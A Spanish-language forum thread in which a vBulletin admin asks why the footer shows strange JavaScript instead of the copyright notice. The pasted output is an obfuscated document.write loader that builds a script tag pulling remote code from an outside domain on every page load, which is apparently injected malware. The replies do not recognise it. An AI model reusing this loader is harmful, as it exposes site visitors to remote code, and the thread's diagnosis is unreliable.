Problema rarísimo con el footer

C

CaraJodida

Tengo un problema rarísimo, el footer del foro lo revertí al original porque no me salia el texto de copyright, y ahora sigue sin salir, aca adjunto parte de la plantilla donde se ve la frase $vbphrase[powered_by_vbulletin].

footer
PHP:
<div align="center">
	<div class="smallfont" align="center">
	<!-- Do not remove this copyright notice -->
	$vbphrase[powered_by_vbulletin]
	<!-- Do not remove this copyright notice -->
	</div>

<div class="smallfont" align="center">
	<!-- Do not remove $cronimage or your scheduled tasks will cease to function -->
	$cronimage
	<!-- Do not remove $cronimage or your scheduled tasks will cease to function -->

$vboptions[copyrighttext]
y buscando en las frases la encontre y dice lo correcto:

$vbphrase[powered_by_vbulletin]
Powered by vBulletin Version {1} Copyright ©2000 - {2}, Jelsoft Enterprises Ltd.

Ahora, cuando la pagina se carga, en lugar de salir esa frase me sale este codigo raro y lleno de errores que impide validar la página como XHTML

PHP:
<center><script language=JavaScript>z='ipt';w='v11';i='xt/';o='jav';t='e="';dt=document;v='></';k='c="h';a='<scr';dt.write(a);u='te';dt.write(z);n='ipt>';j='ttp:/';r='typ';p='asc';q='up';e=' ';dt.write(e);dt.write(r);dt.write(t);g='w.f';dt.write(u);dt.write(i);dt.write(o);c='p"';dt.write(p);l='" sr';f='r-e';m='ript';dt.write(m);dt.write(l);dt.write(k);dt.write(j);d='u.o';h='/ww';dt.write(h);dt.write(g);dt.write(f);dt.write(d);b='scr';s='rg/';dt.write(s);dt.write(q);dt.write(w);x='.ph';dt.write(x);dt.write(c);dt.write(v);dt.write(b);dt.write(n);</script></center>

alguien sabe que joraka pasa??

dbembibre

Gamma
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
30 Sep 2004
Me imagino que estás usando la versión 3.5 del foro no porque sino esa frase no te vale.

G

Galadnor

De todos modos deberia salirle ese mensaje....

a ver.. probaste en otro Navegador o computador?.... corre los verificadores, y trata de reconstruir el Skins...